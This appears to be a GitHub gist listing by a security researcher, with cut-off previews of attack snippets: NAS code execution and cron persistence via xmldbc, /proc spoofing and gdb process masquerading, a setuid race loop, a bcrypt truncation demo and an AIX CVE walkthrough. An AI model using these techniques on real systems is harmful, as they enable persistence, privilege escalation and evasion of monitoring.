Tim Brown timb-machine
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ tar --version | |
| tar (GNU tar) 1.34 | |
| Copyright © 2021 Free Software Foundation, Inc. | |
| Licence GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>. | |
| This is free software: you are free to change and redistribute it. | |
| There is NO WARRANTY, to the extent permitted by law. | |
| Written by John Gilmore and Jay Fenlason. | |
| $ tar ztvf file\:M.m.p.tar.gz | |
| The authenticity of host 'file (192.168.67.59)' can't be established. |
timb-machine
/ So you just want code execution on your NAS?
Created
June 5, 2025 21:15
So you just want code execution on your NAS?
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| If you don't need persistence, why work so hard? | |
| $ rm /foo; xmldbc -t "test:10:touch /foo"; ls -la /foo; xmldbc -D /tmp/config.xml; sleep 20; ls -la /foo | |
| ls: /foo: No such file or directory | |
| -rw-r--r-- 1 root root 0 Jun 5 22:11 /foo |
timb-machine
/ Adding persistence to WD MyCloud NAS device cron...
Last active
August 30, 2025 16:36
Adding persistence to WD MyCloud NAS device cron...
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Say for exmaple, you wanted a cron entry that would run persist.sh every 5 minutes... | |
| $ xmldbc -s /system_mgr/crond/list/count "9" | |
| $ xmldbc -s /system_mgr/crond/list/name:9 "persist" | |
| $ xmldbc -s /system_mgr/crond/persist/count "1" | |
| $ xmldbc -s /system_mgr/crond/persist/item:1/method "3" | |
| $ xmldbc -s /system_mgr/crond/persist/item:1/1 "*/5" | |
| $ xmldbc -s /system_mgr/crond/persist/item:1/2 "*" | |
| $ xmldbc -s /system_mgr/crond/persist/item:1/3 "*" | |
| $ xmldbc -s /system_mgr/crond/persist/item:1/4 "*" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Falcon-sensor strace: | |
| 1185 init_module(0x556ce33f8b00, 204357, "") = 0 | |
| 1185 init_module(0x556ce3430940, 122757, "") = 0 | |
| 1185 init_module(0x556ce342a950, 24541, "") = 0 | |
| 1185 init_module(0x7f33243be010, 1718317, "configbuild=1007.8.0012905.1") = 0 | |
| (gdb) catch syscall init_module | |
| (gdb) run | |
| … |
timb-machine
/ Example of bcrypt() weakness around input string truncation (the choice of PHP is arbitrary)
Created
March 1, 2025 21:47
Example of bcrypt() weakness around input string truncation (the choice of PHP is arbitrary)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if (password_hash("123567890123567890123567890123567890123567890123567890123567890123456789" . "test", PASSWORD_BCRYPT, ["salt" => "1234567890123456789012"]) === password_hash("123567890123567890123567890123567890123567890123567890123567890123456789" . "hell", PASSWORD_BCRYPT, ["salt" => "1234567890123456789012"])) { | |
| print "matches\n"; | |
| } | |
| ?> |
timb-machine
/ CVE-2022-36768 for shits and giggles... (WIP)
Last active
August 30, 2025 16:37
CVE-2022-36768 for shits and giggles... (WIP)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| We start by unpacking the patch. On this occasion it's shipped as an RTE file (an AIX specific backup format), so we need to unpack it on our AIX VM like so: | |
| $ restore -T -f ../invscout.rte | |
| /lpp_name | |
| /usr | |
| /usr/lpp | |
| /usr/lpp/invscout.rte | |
| /usr/lpp/invscout.rte/liblpp.a | |
| /usr/lpp/invscout.rte/inst_root | |
| /usr/lpp/invscout.rte/inst_root/liblpp.a |
timb-machine
/ CVE-2022-36768 for shits and giggles...
Last active
August 30, 2025 16:37
CVE-2022-36768 for shits and giggles...
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| We start by unpacking the patch. On this occasion it's shipped as an RTE file (an AIX specific backup format), so we need to unpack it on our AIX VM like so: | |
| $ restore -T -f ../invscout.rte | |
| /lpp_name | |
| /usr | |
| /usr/lpp | |
| /usr/lpp/invscout.rte | |
| /usr/lpp/invscout.rte/liblpp.a | |
| /usr/lpp/invscout.rte/inst_root | |
| /usr/lpp/invscout.rte/inst_root/liblpp.a |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # ps -aef | grep 94 | |
| root 94 2 0 Jun16 ? 00:00:00 [kworker/6:1H] | |
| root 594 2 0 Jun16 ? 00:00:00 [ipv6_addrconf] | |
| root 4692 2509 0 01:17 pts/0 00:00:00 grep 94 | |
| root 20394 2 0 Oct08 ? 00:00:20 [kworker/u32:2] | |
| # mkdir -p spoof/fd; mount -o bind spoof /proc/94; ln -s socket:\[283\] /proc/94/fd/99; ls -la /proc/94/fd | |
| total 4 | |
| drwxr-xr-x 2 root root 4096 Oct 9 01:16 . | |
| dr-xr-xr-x 193 root root 0 Jun 16 17:40 .. | |
| lrwxrwxrwx 1 root root 12 Oct 9 01:16 99 -> socket:[283] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ nc -v -l -p 5000 & ps -aef | grep nc; sudo gdb /bin/nc `pgrep nc` | |
| timb 3976 952 0 00:22 pts/0 00:00:00 nc -v -l -p 5000 | |
| [1] 3976 | |
| listening on [any] 5000 ... | |
| (gdb) info variable environ | |
| All variables matching regular expression "environ": | |
| (gdb) print execve("/bin/bash", 0x00007f717f158118, 0) | |
| process 3976 is executing new program: /bin/bash | |
| $ ps -aef | grep timb | |
| timb 3976 952 0 00:22 pts/0 00:00:00 ?.#.?. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ cat racecar.sh | |
| #!/bin/sh | |
| while : | |
| do | |
| echo "#!/bin/sh" > /Volumes/USB/a | |
| chmod u+xs /Volumes/USB/a | |
| ls -la /Volumes/USB/a | grep sr | grep -v 10 | |
| done |
NewerOlder